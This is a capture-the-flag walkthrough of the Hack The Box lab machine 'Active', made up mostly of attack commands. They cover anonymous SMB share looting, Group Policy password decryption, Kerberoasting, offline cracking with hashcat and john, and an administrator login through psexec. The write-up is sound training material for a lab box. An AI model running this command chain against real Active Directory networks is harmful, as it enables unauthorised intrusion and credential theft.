Hack the Box Active (OSCP like boxes and beyond)
Today we will be looking at a retired HTB Machine Active, which is an Active Directory machine. This machine is part of the Beyond this Module in Hack The Box Academy, Active Directory Enumeration and attacks. Starting off as usual with a port scan we see the following:
rustscan --ulimit 5000 -a 10.10.10.100 -- -Pn
Enumerating SMB we see the following:
smbclient -L "\\\\10.10.10.100\\"
We can also use netexec which is the newest crackmapexec:
nxc smb 10.10.10.100 -u '' -p '' --shares
We have read permissions over replication. Lets go into that share and get everything we can:
The following commands were used (do not use this unless you want to get everything in a share):
smbclient "\\\\10.10.10.100\\Replication"
recurse on
prompt off
mget *Instead of looking through every folder I first looked for password but couldn’t find anything so then looked for user and found the following:
grep -rwi "user"
Looks like we have a cpassword, lets extract that:
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
Now we have the user of SVC_TGS and a password, lets use CrackEverything, remember if using netexec use this https://github.com/overgrowncarrot1/NetEverything./blob/main/NetExecEverything.py and if using CrackMapExec version 6, this one https://github.com/overgrowncarrot1/CrackEverything6/blob/main/CrackEverything6.py, if you are still on version 5 watch her to learn how to upgrade to netexec https://youtu.be/nDBKRCQzy-0.
CrackEverything.py -u svc_tgs -p GPPs***** -r 10.10.10.100 -J -Z Shell!Remember, if you have never changed your .conf file then your -Z will be different, such as -Z Pwn3d!
Looks like we didn’t get a Shell! anywhere, however, we can read more shares:
CrackEverything.py -u svc_tgs -p GPPs***** -r 10.10.10.100 -Z Shell!Notice about we removed the -J.
Now lets put active.htb into /etc/hosts:
From here we can see if there are any service accounts:
GetUserSPNs.py 'active.htb/svc_tgs:GPPs*****'
We do have one, lets request a ticket:
GetUserSPNs.py 'active.htb/svc_tgs:GPPs*****' -request
Now we can copy that into a file and try to crack it with John or Hashcat:
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --fork=4We receive a password back:
Lastly, we login through psexec:
psexec.py '/administrator:Tick****'@10.10.10.100
I hope you all enjoyed reading this for a video walkthrough you can see it here:
https://youtu.be/1zmSNbCABGg
